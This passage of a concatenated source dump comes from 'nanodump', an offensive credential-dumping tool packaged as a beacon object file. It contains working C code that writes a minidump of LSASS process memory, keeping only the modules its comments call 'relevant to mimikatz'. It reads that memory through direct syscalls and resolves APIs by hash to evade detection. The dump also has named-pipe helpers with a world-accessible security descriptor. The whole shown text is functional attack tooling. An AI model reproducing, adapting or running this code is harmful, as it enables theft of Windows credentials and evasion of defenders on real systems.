        if (ldr_entry_address == first_ldr_entry_address)
            break;
    }
    // the LSASS process should always have 'lsasrv.dll' loaded
    if (is_lsass && !lsasrv_found)
    {
        PRINT_ERR("The selected process is not " LSASS ".");
        return NULL;
    }
    return module_list;
}


================================================
FILE: Creds-BOF/nanodump/source/nanodump.c
================================================
#include "nanodump.h"
#ifdef BOF
#include "output.h"
#include "utils.c"
#include "handle.c"
#include "modules.c"
#include "syscalls.c"
#include "token_priv.c"
#include "malseclogon.c"
#include "werfault.c"
#include "spoof_callstack.c"
#include "shtinkering.c"
#include "impersonate.c"
#include "hw_breakpoint.c"
#endif

VOID writeat(
    IN Pdump_context dc,
    IN ULONG32 rva,
    IN const PVOID data,
    IN unsigned size)
{
    PVOID dst = RVA(
        PVOID,
        dc->BaseAddress,
        rva);
    memcpy(dst, data, size);
}

BOOL append(
    IN Pdump_context dc,
    IN const PVOID data,
    IN ULONG32 size)
{
    ULONG32 new_rva = dc->rva + size;
    if (new_rva < dc->rva)
    {
        PRINT_ERR("The dump size exceeds the 32-bit address space!");
        return FALSE;
    }
    else if (new_rva >= dc->DumpMaxSize)
    {
        PRINT_ERR("The dump is too big, please increase DUMP_MAX_SIZE.");
        return FALSE;
    }
    else
    {
        writeat(dc, dc->rva, data, size);
        dc->rva = new_rva;
        return TRUE;
    }
}

BOOL write_header(
    IN Pdump_context dc)
{
    DPRINT("Writing header");
    MiniDumpHeader header = { 0 };
    DPRINT("Signature: 0x%x", dc->Signature);
    header.Signature = dc->Signature;
    DPRINT("Version: %hu", dc->Version);
    header.Version = dc->Version;
    DPRINT("ImplementationVersion: %hu", dc->ImplementationVersion);
    header.ImplementationVersion = dc->ImplementationVersion;
    header.NumberOfStreams = 3; // we only need: SystemInfoStream, ModuleListStream and Memory64ListStream
    header.StreamDirectoryRva = SIZE_OF_HEADER;
    header.CheckSum = 0;
    header.Reserved = 0;
    header.TimeDateStamp = 0;
    header.Flags = MiniDumpNormal;

    char header_bytes[SIZE_OF_HEADER] = { 0 };

    DWORD offset = 0;
    memcpy(header_bytes + offset, &header.Signature, 4); offset += 4;
    memcpy(header_bytes + offset, &header.Version, 2); offset += 2;
    memcpy(header_bytes + offset, &header.ImplementationVersion, 2); offset += 2;
    memcpy(header_bytes + offset, &header.NumberOfStreams, 4); offset += 4;
    memcpy(header_bytes + offset, &header.StreamDirectoryRva, 4); offset += 4;
    memcpy(header_bytes + offset, &header.CheckSum, 4); offset += 4;
    memcpy(header_bytes + offset, &header.Reserved, 4); offset += 4;
    memcpy(header_bytes + offset, &header.TimeDateStamp, 4); offset += 4;
    memcpy(header_bytes + offset, &header.Flags, 4);

    if (!append(dc, header_bytes, SIZE_OF_HEADER))
    {
        DPRINT_ERR("Failed to write header");
        return FALSE;
    }

    return TRUE;
}

BOOL write_directory(
    IN Pdump_context dc,
    IN MiniDumpDirectory directory)
{
    BYTE directory_bytes[SIZE_OF_DIRECTORY] = { 0 };
    DWORD offset = 0;
    memcpy(directory_bytes + offset, &directory.StreamType, 4); offset += 4;
    memcpy(directory_bytes + offset, &directory.DataSize, 4); offset += 4;
    memcpy(directory_bytes + offset, &directory.Rva, 4);
    if (!append(dc, directory_bytes, sizeof(directory_bytes)))
        return FALSE;

    return TRUE;
}

BOOL write_directories(
    IN Pdump_context dc)
{
    DPRINT("Writing directory: SystemInfoStream");
    MiniDumpDirectory system_info_directory = { 0 };
    system_info_directory.StreamType = SystemInfoStream;
    system_info_directory.DataSize = 0; // this is calculated and written later
    system_info_directory.Rva = 0; // this is calculated and written later
    if (!write_directory(dc, system_info_directory))
    {
        DPRINT_ERR("Failed to write directory");
        return FALSE;
    }

    DPRINT("Writing directory: ModuleListStream");
    MiniDumpDirectory module_list_directory = { 0 };
    module_list_directory.StreamType = ModuleListStream;
    module_list_directory.DataSize = 0; // this is calculated and written later
    module_list_directory.Rva = 0; // this is calculated and written later
    if (!write_directory(dc, module_list_directory))
    {
        DPRINT_ERR("Failed to write directory");
        return FALSE;
    }

    DPRINT("Writing directory: Memory64ListStream");
    MiniDumpDirectory memory64_list_directory = { 0 };
    memory64_list_directory.StreamType = Memory64ListStream;
    memory64_list_directory.DataSize = 0; // this is calculated and written later
    memory64_list_directory.Rva = 0; // this is calculated and written later
    if (!write_directory(dc, memory64_list_directory))
    {
        DPRINT_ERR("Failed to write directory");
        return FALSE;
    }

    return TRUE;
}

BOOL write_system_info_stream(
    IN Pdump_context dc)
{
    MiniDumpSystemInfo system_info = { 0 };

    DPRINT("Writing SystemInfoStream");

    // read the version and build numbers from the PEB
    PVOID pPeb;
    PULONG32 OSMajorVersion;
    PULONG32 OSMinorVersion;
    PUSHORT OSBuildNumber;
    PULONG32 OSPlatformId;
    PUNICODE_STRING CSDVersion;
    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    OSMajorVersion = RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);
    OSMinorVersion = RVA(PULONG32, pPeb, OSMINORVERSION_OFFSET);
    OSBuildNumber = RVA(PUSHORT, pPeb, OSBUILDNUMBER_OFFSET);
    OSPlatformId = RVA(PULONG32, pPeb, OSPLATFORMID_OFFSET);
    CSDVersion = RVA(PUNICODE_STRING, pPeb, CSDVERSION_OFFSET);
    system_info.ProcessorArchitecture = PROCESSOR_ARCHITECTURE;
    DPRINT("OSMajorVersion: %d", *OSMajorVersion);
    DPRINT("OSMinorVersion: %d", *OSMinorVersion);
    DPRINT("OSBuildNumber: %d", *OSBuildNumber);
    DPRINT("CSDVersion: %ls", CSDVersion->Buffer);

    system_info.ProcessorLevel = 0;
    system_info.ProcessorRevision = 0;
    system_info.NumberOfProcessors = 0;
    // RtlGetVersion -> wProductType
    system_info.ProductType = VER_NT_WORKSTATION;
    //system_info.ProductType = VER_NT_DOMAIN_CONTROLLER;
    //system_info.ProductType = VER_NT_SERVER;
    system_info.MajorVersion = *OSMajorVersion;
    system_info.MinorVersion = *OSMinorVersion;
    system_info.BuildNumber = *OSBuildNumber;
    system_info.PlatformId = *OSPlatformId;
    system_info.CSDVersionRva = 0; // this is calculated and written later
    system_info.SuiteMask = 0;
    system_info.Reserved2 = 0;
#if _WIN64
    system_info.ProcessorFeatures1 = 0;
    system_info.ProcessorFeatures2 = 0;
#else
    system_info.VendorId1 = 0;
    system_info.VendorId2 = 0;
    system_info.VendorId3 = 0;
    system_info.VersionInformation = 0;
    system_info.FeatureInformation = 0;
    system_info.AMDExtendedCpuFeatures = 0;
#endif

    ULONG32 stream_size = SIZE_OF_SYSTEM_INFO_STREAM;
    char system_info_bytes[SIZE_OF_SYSTEM_INFO_STREAM] = { 0 };

    DWORD offset = 0;
    memcpy(system_info_bytes + offset, &system_info.ProcessorArchitecture, 2); offset += 2;
    memcpy(system_info_bytes + offset, &system_info.ProcessorLevel, 2); offset += 2;
    memcpy(system_info_bytes + offset, &system_info.ProcessorRevision, 2); offset += 2;
    memcpy(system_info_bytes + offset, &system_info.NumberOfProcessors, 1); offset += 1;
    memcpy(system_info_bytes + offset, &system_info.ProductType, 1); offset += 1;
    memcpy(system_info_bytes + offset, &system_info.MajorVersion, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.MinorVersion, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.BuildNumber, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.PlatformId, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.CSDVersionRva, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.SuiteMask, 2); offset += 2;
    memcpy(system_info_bytes + offset, &system_info.Reserved2, 2); offset += 2;
#if _WIN64
    memcpy(system_info_bytes + offset, &system_info.ProcessorFeatures1, 8); offset += 8;
    memcpy(system_info_bytes + offset, &system_info.ProcessorFeatures2, 8);
#else
    memcpy(system_info_bytes + offset, &system_info.VendorId1, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.VendorId2, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.VendorId3, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.VersionInformation, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.FeatureInformation, 4); offset += 4;
    memcpy(system_info_bytes + offset, &system_info.AMDExtendedCpuFeatures, 4);
#endif

    ULONG32 stream_rva = dc->rva;
    if (!append(dc, system_info_bytes, stream_size))
    {
        DPRINT_ERR("Failed to write the SystemInfoStream");
        return FALSE;
    }

    // write our length in the MiniDumpSystemInfo directory
    writeat(dc, SIZE_OF_HEADER + 4, &stream_size, 4); // header + streamType

    // write our RVA in the MiniDumpSystemInfo directory
    writeat(dc, SIZE_OF_HEADER + 4 + 4, &stream_rva, 4); // header + streamType + Location.DataSize

    // write the service pack
    ULONG32 sp_rva = dc->rva;
    ULONG32 Length = CSDVersion->Length;
    // write the length
    if (!append(dc, &Length, 4))
    {
        DPRINT_ERR("Failed to write the SystemInfoStream");
        return FALSE;
    }
    // write the service pack name
    if (!append(dc, CSDVersion->Buffer, CSDVersion->Length))
    {
        DPRINT_ERR("Failed to write the SystemInfoStream");
        return FALSE;
    }
    // write the service pack RVA in the SystemInfoStream
    writeat(dc, stream_rva + 24, &sp_rva, 4); // addrof CSDVersionRva

    return TRUE;
}

Pmodule_info write_module_list_stream(
    IN Pdump_context dc)
{
    DPRINT("Writing the ModuleListStream");

    // list of modules relevant to mimikatz
    wchar_t* important_modules[] = {
        L"lsasrv.dll", L"msv1_0.dll", L"tspkg.dll", L"wdigest.dll", L"kerberos.dll",
        L"livessp.dll", L"dpapisrv.dll", L"kdcsvc.dll", L"cryptdll.dll", L"lsadb.dll",
        L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll", L"eventlog.dll",
        L"wevtsvc.dll", L"termsrv.dll", L"cloudap.dll"
    };
    Pmodule_info module_list = find_modules(
        dc->hProcess,
        important_modules,
        ARRAY_SIZE(important_modules),
        TRUE);
    if (!module_list)
    {
        DPRINT_ERR("Failed to write the ModuleListStream");
        return NULL;
    }

    // write the full path of each dll
    Pmodule_info curr_module = module_list;
    ULONG32 number_of_modules = 0;
    while (curr_module)
    {
        number_of_modules++;
        curr_module->name_rva = dc->rva;
        ULONG32 full_name_length = (ULONG32)wcsnlen((wchar_t*)&curr_module->dll_name, sizeof(curr_module->dll_name));
        full_name_length++; // account for the null byte at the end
        full_name_length *= 2;
        // write the length of the name
        if (!append(dc, &full_name_length, 4))
        {
            DPRINT_ERR("Failed to write the ModuleListStream");
            free_linked_list(module_list, sizeof(module_info)); module_list = NULL;
            return NULL;
        }
        // write the path
        if (!append(dc, curr_module->dll_name, full_name_length))
        {
            DPRINT_ERR("Failed to write the ModuleListStream");
            free_linked_list(module_list, sizeof(module_info)); module_list = NULL;
            return NULL;
        }
        curr_module = curr_module->next;
    }

    ULONG32 stream_rva = dc->rva;
    // write the number of modules
    if (!append(dc, &number_of_modules, 4))
    {
        DPRINT_ERR("Failed to write the ModuleListStream");
        free_linked_list(module_list, sizeof(module_info)); module_list = NULL;
        return NULL;
    }
    BYTE module_bytes[SIZE_OF_MINIDUMP_MODULE] = { 0 };
    curr_module = module_list;
    while (curr_module)
    {
        MiniDumpModule module = { 0 };
        module.BaseOfImage = (ULONG_PTR)curr_module->dll_base;
        module.SizeOfImage = curr_module->size_of_image;
        module.CheckSum = curr_module->CheckSum;
        module.TimeDateStamp = curr_module->TimeDateStamp;
        module.ModuleNameRva = curr_module->name_rva;
        module.VersionInfo.dwSignature = 0;
        module.VersionInfo.dwStrucVersion = 0;
        module.VersionInfo.dwFileVersionMS = 0;
        module.VersionInfo.dwFileVersionLS = 0;
        module.VersionInfo.dwProductVersionMS = 0;
        module.VersionInfo.dwProductVersionLS = 0;
        module.VersionInfo.dwFileFlagsMask = 0;
        module.VersionInfo.dwFileFlags = 0;
        module.VersionInfo.dwFileOS = 0;
        module.VersionInfo.dwFileType = 0;
        module.VersionInfo.dwFileSubtype = 0;
        module.VersionInfo.dwFileDateMS = 0;
        module.VersionInfo.dwFileDateLS = 0;
        module.CvRecord.DataSize = 0;
        module.CvRecord.rva = 0;
        module.MiscRecord.DataSize = 0;
        module.MiscRecord.rva = 0;
        module.Reserved0 = 0;
        module.Reserved1 = 0;

        DWORD offset = 0;
        memcpy(module_bytes + offset, &module.BaseOfImage, 8); offset += 8;
        memcpy(module_bytes + offset, &module.SizeOfImage, 4); offset += 4;
        memcpy(module_bytes + offset, &module.CheckSum, 4); offset += 4;
        memcpy(module_bytes + offset, &module.TimeDateStamp, 4); offset += 4;
        memcpy(module_bytes + offset, &module.ModuleNameRva, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwSignature, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwStrucVersion, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileVersionMS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileVersionLS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwProductVersionMS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwProductVersionLS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileFlagsMask, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileFlags, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileOS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileType, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileSubtype, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileDateMS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.VersionInfo.dwFileDateLS, 4); offset += 4;
        memcpy(module_bytes + offset, &module.CvRecord.DataSize, 4); offset += 4;
        memcpy(module_bytes + offset, &module.CvRecord.rva, 4); offset += 4;
        memcpy(module_bytes + offset, &module.MiscRecord.DataSize, 4); offset += 4;
        memcpy(module_bytes + offset, &module.MiscRecord.rva, 4); offset += 4;
        memcpy(module_bytes + offset, &module.Reserved0, 8); offset += 8;
        memcpy(module_bytes + offset, &module.Reserved1, 8);

        if (!append(dc, module_bytes, sizeof(module_bytes)))
        {
            DPRINT_ERR("Failed to write the ModuleListStream");
            free_linked_list(module_list, sizeof(module_info)); module_list = NULL;
            return NULL;
        }
        curr_module = curr_module->next;
    }

    // write our length in the ModuleListStream directory
    ULONG32 stream_size = 4 + number_of_modules * sizeof(module_bytes);
    writeat(dc, SIZE_OF_HEADER + SIZE_OF_DIRECTORY + 4, &stream_size, 4); // header + 1 directory + streamType

    // write our RVA in the ModuleListStream directory
    writeat(dc, SIZE_OF_HEADER + SIZE_OF_DIRECTORY + 4 + 4, &stream_rva, 4); // header + 1 directory + streamType + Location.DataSize

    return module_list;
}

BOOL is_important_module(
    IN PVOID address,
    IN Pmodule_info module_list)
{
    Pmodule_info curr_module = module_list;
    while (curr_module)
    {
        if ((ULONG_PTR)address >= (ULONG_PTR)curr_module->dll_base &&
            (ULONG_PTR)address < RVA(ULONG_PTR, curr_module->dll_base, curr_module->size_of_image))
            return TRUE;
        curr_module = curr_module->next;
    }
    return FALSE;
}

PMiniDumpMemoryDescriptor64 get_memory_ranges(
    IN Pdump_context dc,
    IN Pmodule_info module_list)
{
    PMiniDumpMemoryDescriptor64 ranges_list = NULL;
    PVOID base_address, current_address;
    PMiniDumpMemoryDescriptor64 new_range;
    ULONG64 region_size;
    current_address = 0;
    MEMORY_INFORMATION_CLASS mic = 0;
    MEMORY_BASIC_INFORMATION mbi = {0};
    DWORD number_of_ranges = 0;
    NTSTATUS status;

    DPRINT("Getting memory ranges to dump");

    while (TRUE)
    {
        status = NtQueryVirtualMemory(
            dc->hProcess,
            (PVOID)current_address,
            mic,
            &mbi,
            sizeof(mbi),
            NULL);
        if (!NT_SUCCESS(status))
            break;

        base_address = mbi.BaseAddress;
        region_size = mbi.RegionSize;

        if (((ULONG_PTR)base_address + region_size) < (ULONG_PTR)base_address)
            break;

        // next memory range
        current_address = RVA(PVOID, base_address, region_size);

        // ignore non-commited pages
        if (mbi.State != MEM_COMMIT)
            continue;
        // ignore mapped pages
        if (mbi.Type  == MEM_MAPPED)
            continue;
        // ignore pages with PAGE_NOACCESS
        if ((mbi.Protect & PAGE_NOACCESS) == PAGE_NOACCESS)
            continue;
        // ignore pages with PAGE_GUARD
        if ((mbi.Protect & PAGE_GUARD)    == PAGE_GUARD)
            continue;
        // ignore pages with PAGE_EXECUTE
        if ((mbi.Protect & PAGE_EXECUTE)  == PAGE_EXECUTE)
            continue;
        // ignore modules that are not relevant to mimikatz
        if (mbi.Type == MEM_IMAGE &&
            !is_important_module(
                base_address,
                module_list))
            continue;
#ifdef SSP
        // if nanodump is running in LSASS, don't dump the dump :)
        if (dc->BaseAddress == base_address)
            continue;
#endif

        new_range = intAlloc(sizeof(MiniDumpMemoryDescriptor64));
        if(!new_range)
        {
            malloc_failed();
            DPRINT_ERR("Failed to get memory ranges to dump");
            return NULL;
        }
        new_range->next = NULL;
        new_range->StartOfMemoryRange = (ULONG_PTR)base_address;
        new_range->DataSize = region_size;
        new_range->State = mbi.State;
        new_range->Protect = mbi.Protect;
        new_range->Type = mbi.Type;

        if (!ranges_list)
        {
            ranges_list = new_range;
        }
        else
        {
            PMiniDumpMemoryDescriptor64 last_range = ranges_list;
            while (last_range->next)
                last_range = last_range->next;
            last_range->next = new_range;
        }
        number_of_ranges++;
    }
    if (!ranges_list)
    {
        syscall_failed("NtQueryVirtualMemory", status);
        DPRINT_ERR("Failed to enumerate memory ranges");
        return NULL;
    }
    DPRINT(
        "Enumearted %ld ranges of memory",
        number_of_ranges);
    return ranges_list;
}

PMiniDumpMemoryDescriptor64 write_memory64_list_stream(
    IN Pdump_context dc,
    IN Pmodule_info module_list)
{
    PMiniDumpMemoryDescriptor64 memory_ranges;
    ULONG32 stream_rva = dc->rva;

    DPRINT("Writing the Memory64ListStream");

    memory_ranges = get_memory_ranges(
        dc,
        module_list);
    if (!memory_ranges)
    {
        DPRINT_ERR("Failed to write the Memory64ListStream");
        return NULL;
    }

    // write the number of ranges
    PMiniDumpMemoryDescriptor64 curr_range = memory_ranges;
    ULONG64 number_of_ranges = 0;
    while (curr_range)
    {
        number_of_ranges++;
        curr_range = curr_range->next;
    }
    if (!append(dc, &number_of_ranges, 8))
    {
        DPRINT_ERR("Failed to write the Memory64ListStream");
        free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;
        return NULL;
    }
    // make sure we don't overflow stream_size
    if (16 + 16 * number_of_ranges > 0xffffffff)
    {
        DPRINT_ERR("Too many ranges!");
        free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;
        return NULL;
    }

    // write the rva of the actual memory content
    ULONG32 stream_size = (ULONG32)(16 + 16 * number_of_ranges);
    ULONG64 base_rva = (ULONG64)stream_rva + stream_size;
    if (!append(dc, &base_rva, 8))
    {
        DPRINT_ERR("Failed to write the Memory64ListStream");
        free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;
        return NULL;
    }

    // write the start and size of each memory range
    curr_range = memory_ranges;
    while (curr_range)
    {
        if (!append(dc, &curr_range->StartOfMemoryRange, 8))
        {
            DPRINT_ERR("Failed to write the Memory64ListStream");
            free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;
            return NULL;
        }
        if (!append(dc, &curr_range->DataSize, 8))
        {
            DPRINT_ERR("Failed to write the Memory64ListStream");
            free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;
            return NULL;
        }
        curr_range = curr_range->next;
    }

    // write our length in the Memory64ListStream directory
    writeat(dc, SIZE_OF_HEADER + SIZE_OF_DIRECTORY * 2 + 4, &stream_size, 4); // header + 2 directories + streamType

    // write our RVA in the Memory64ListStream directory
    writeat(dc, SIZE_OF_HEADER + SIZE_OF_DIRECTORY * 2 + 4 + 4, &stream_rva, 4); // header + 2 directories + streamType + Location.DataSize

    // dump all the selected memory ranges
    curr_range = memory_ranges;
    while (curr_range)
    {
        // DataSize can be very large but HeapAlloc should be able to handle it
        PBYTE buffer = intAlloc(curr_range->DataSize);
        if (!buffer)
        {
            DPRINT_ERR("Failed to write the Memory64ListStream");
            malloc_failed();
            return NULL;
        }
        NTSTATUS status = NtReadVirtualMemory(
            dc->hProcess,
            (PVOID)(ULONG_PTR)curr_range->StartOfMemoryRange,
            buffer,
            curr_range->DataSize,
            NULL);
        // once in a while, a range fails with STATUS_PARTIAL_COPY, not relevant for mimikatz
        if (!NT_SUCCESS(status) && status != STATUS_PARTIAL_COPY)
        {
            DPRINT_ERR(
                "Failed to read memory range: StartOfMemoryRange: 0x%p, DataSize: 0x%64llx, State: 0x%lx, Protect: 0x%lx, Type: 0x%lx, NtReadVirtualMemory status: 0x%lx. Continuing anyways...",
                (PVOID)(ULONG_PTR)curr_range->StartOfMemoryRange,
                curr_range->DataSize,
                curr_range->State,
                curr_range->Protect,
                curr_range->Type,
                status);
            //return NULL;
        }
        if (curr_range->DataSize > 0xffffffff)
        {
            DPRINT_ERR("The current range is larger that the 32-bit address space!");
            curr_range->DataSize = 0xffffffff;
        }
        if (!append(dc, buffer, (ULONG32)curr_range->DataSize))
        {
            DPRINT_ERR("Failed to write the Memory64ListStream");
            free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;
            DATA_FREE(buffer, curr_range->DataSize);
            return NULL;
        }
        DATA_FREE(buffer, curr_range->DataSize);
        curr_range = curr_range->next;
    }

    return memory_ranges;
}

BOOL NanoDumpWriteDump(
    IN Pdump_context dc)
{
    DPRINT("Writing nanodump");

    if (!write_header(dc))
        return FALSE;

    if (!write_directories(dc))
        return FALSE;

    if (!write_system_info_stream(dc))
        return FALSE;

    Pmodule_info module_list;
    module_list = write_module_list_stream(dc);
    if (!module_list)
        return FALSE;

    PMiniDumpMemoryDescriptor64 memory_ranges;
    memory_ranges = write_memory64_list_stream(dc, module_list);
    if (!memory_ranges)
    {
        free_linked_list(module_list, sizeof(module_info)); module_list = NULL;
        return FALSE;
    }

    free_linked_list(module_list, sizeof(module_info)); module_list = NULL;

    free_linked_list(memory_ranges, sizeof(MiniDumpMemoryDescriptor64)); memory_ranges = NULL;

    DPRINT("The nanodump was created succesfully");

    return TRUE;
}


================================================
FILE: Creds-BOF/nanodump/source/output.c
================================================
#include "output.h"

#if defined(DDL) && defined(PPL_DUMP)

#ifndef intAlloc
#define intAlloc(size) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#endif
#ifndef intFree
#define intFree(addr) HeapFree(GetProcessHeap(), 0, addr)
#endif
#ifndef DATA_FREE
#define DATA_FREE(d, l) \
    if (d) { \
        memset(d, 0, l); \
        intFree(d); \
        d = NULL; \
    }
#endif

VOID LogToConsole(
    IN LPCSTR pwszFormat,
    ...)
{
    //
    // The process in which we load this DLL does not have a console so we need to attach to the 
    // parent process' console. To do so, we can call AttachConsole with the special value 
    // ATTACH_PARENT_PROCESS. Then, we can get the STDOUT handle. This handle is stored will be 
    // stored as a global variable so we need to initialize it only once.
    //
    AttachConsole(ATTACH_PARENT_PROCESS);

    //
    // Prepare otuput string and use WriteConsole instead of wprintf. This way, we can directly use
    // the STDOUT handle we got previously.
    //
    DWORD dwOutputStringSize = 0;
    LPSTR pwszOutputString = NULL;
    va_list va;

    va_start(va, pwszFormat);

    dwOutputStringSize = _vscprintf(pwszFormat, va) + 2; // \0
    pwszOutputString = intAlloc(dwOutputStringSize);

    if (pwszOutputString)
    {
        vsprintf_s(pwszOutputString, dwOutputStringSize, pwszFormat, va);

        WriteConsole(GetStdHandle(STD_OUTPUT_HANDLE), pwszOutputString, (DWORD)strlen(pwszOutputString), NULL, NULL);

        DATA_FREE(pwszOutputString, dwOutputStringSize);
    }

    va_end(va);
}
#endif


================================================
FILE: Creds-BOF/nanodump/source/pipe.c
================================================
#include "pipe.h"

#if defined(PPL_MEDIC) || defined(SSP)

BOOL server_create_named_pipe(
    IN LPCWSTR pipe_name,
    IN BOOL async,
    OUT PHANDLE hPipe)
{
    BOOL                ret_val        = FALSE;
    BOOL                success        = FALSE;
    LPWSTR              pwszPipeName   = NULL;
    SECURITY_DESCRIPTOR sd             = { 0 };
    SECURITY_ATTRIBUTES sa             = { 0 };
    DWORD               dwOpenMode     = 0;
    DWORD               dwPipeMode     = 0;
    DWORD               dwMaxInstances = 0;

    InitializeSecurityDescriptor_t                         InitializeSecurityDescriptor = NULL;
    ConvertStringSecurityDescriptorToSecurityDescriptorW_t ConvertStringSecurityDescriptorToSecurityDescriptorW = NULL;
    CreateNamedPipeW_t                                     CreateNamedPipeW                                     = NULL;

    InitializeSecurityDescriptor = (InitializeSecurityDescriptor_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        InitializeSecurityDescriptor_SW2_HASH,
        0);
    if (!InitializeSecurityDescriptor)
    {
        api_not_found("InitializeSecurityDescriptor");
        goto cleanup;
    }

    ConvertStringSecurityDescriptorToSecurityDescriptorW = (ConvertStringSecurityDescriptorToSecurityDescriptorW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        ConvertStringSecurityDescriptorToSecurityDescriptorW_SW2_HASH,
        0);
    if (!ConvertStringSecurityDescriptorToSecurityDescriptorW)
    {
        api_not_found("ConvertStringSecurityDescriptorToSecurityDescriptorW");
        goto cleanup;
    }

    CreateNamedPipeW = (CreateNamedPipeW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateNamedPipeW_SW2_HASH,
        0);
    if (!CreateNamedPipeW)
    {
        api_not_found("CreateNamedPipeW");
        goto cleanup;
    }

    pwszPipeName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszPipeName)
    {
        malloc_failed();
        goto cleanup;
    }

    success = InitializeSecurityDescriptor(
        &sd,
        SECURITY_DESCRIPTOR_REVISION);
    if (!success)
    {
        function_failed("InitializeSecurityDescriptor");
        goto cleanup;
    }

    success = ConvertStringSecurityDescriptorToSecurityDescriptorW(
        L"D:(A;OICI;GA;;;WD)",
        SDDL_REVISION_1,
        &((&sa)->lpSecurityDescriptor),
        NULL);
    if (!success)
    {
        function_failed("ConvertStringSecurityDescriptorToSecurityDescriptorW");
        goto cleanup;
    }

    swprintf_s(pwszPipeName, MAX_PATH, L"\\\\.\\pipe\\%ws", pipe_name);

    dwOpenMode = PIPE_ACCESS_DUPLEX | (async ? FILE_FLAG_OVERLAPPED : 0);
    dwPipeMode = PIPE_TYPE_BYTE | PIPE_WAIT;
    dwMaxInstances = PIPE_UNLIMITED_INSTANCES;

    *hPipe = CreateNamedPipeW(
        pwszPipeName,
        dwOpenMode,
        dwPipeMode,
        dwMaxInstances,
        PAGE_SIZE,
        PAGE_SIZE,
        0,
        &sa);
    if (*hPipe == INVALID_HANDLE_VALUE)
    {
        function_failed("CreateNamedPipeW");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (pwszPipeName)
        intFree(pwszPipeName);

    return ret_val;
}

BOOL client_connect_to_named_pipe(
    IN LPWSTR pipe_name,
    OUT PHANDLE hPipe)
{
    BOOL   ret_val      = FALSE;
    LPWSTR pwszPipeName = NULL;

    CreateFileW_t CreateFileW = NULL;

    CreateFileW = (CreateFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateFileW_SW2_HASH,
        0);
    if (!CreateFileW)
    {
        api_not_found("CreateFileW");
        goto cleanup;
    }

    pwszPipeName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszPipeName)
    {
        malloc_failed();
        goto cleanup;
    }

    swprintf_s(pwszPipeName, MAX_PATH, L"\\\\.\\pipe\\%ws", pipe_name);

    *hPipe = CreateFileW(pwszPipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (*hPipe == INVALID_HANDLE_VALUE)
    {
        function_failed("CreateFileW");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (pwszPipeName)
        intFree(pwszPipeName);

    return ret_val;
}

BOOL server_listen_on_named_pipe(
    IN HANDLE hPipe)
{
    BOOL ret_val          = FALSE;
    BOOL client_connected = FALSE;

    ConnectNamedPipe_t ConnectNamedPipe = NULL;

    ConnectNamedPipe = (ConnectNamedPipe_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        ConnectNamedPipe_SW2_HASH,
        0);
    if (!ConnectNamedPipe)
    {
        api_not_found("ConnectNamedPipe");
        goto cleanup;
    }

    client_connected = ConnectNamedPipe(hPipe, NULL);
    if (!client_connected && GetLastError() != ERROR_PIPE_CONNECTED)
    {
        function_failed("ConnectNamedPipe");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL read_data_from_pipe(
    IN HANDLE hPipe,
    OUT PVOID* data_bytes,
    OUT PDWORD data_size)
{
    BOOL     ret_val     = FALSE;
    BOOL     success     = FALSE;
    DWORD    dwBytesRead = 0;

    ReadFile_t ReadFile = NULL;

    ReadFile = (ReadFile_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        ReadFile_SW2_HASH,
        0);
    if (!ReadFile)
    {
        api_not_found("ReadFile");
        goto cleanup;
    }

    *data_bytes = intAlloc(PAGE_SIZE);
    if (!*data_bytes)
    {
        malloc_failed();
        goto cleanup;
    }

    success = ReadFile(hPipe, *data_bytes, PAGE_SIZE, &dwBytesRead, NULL);
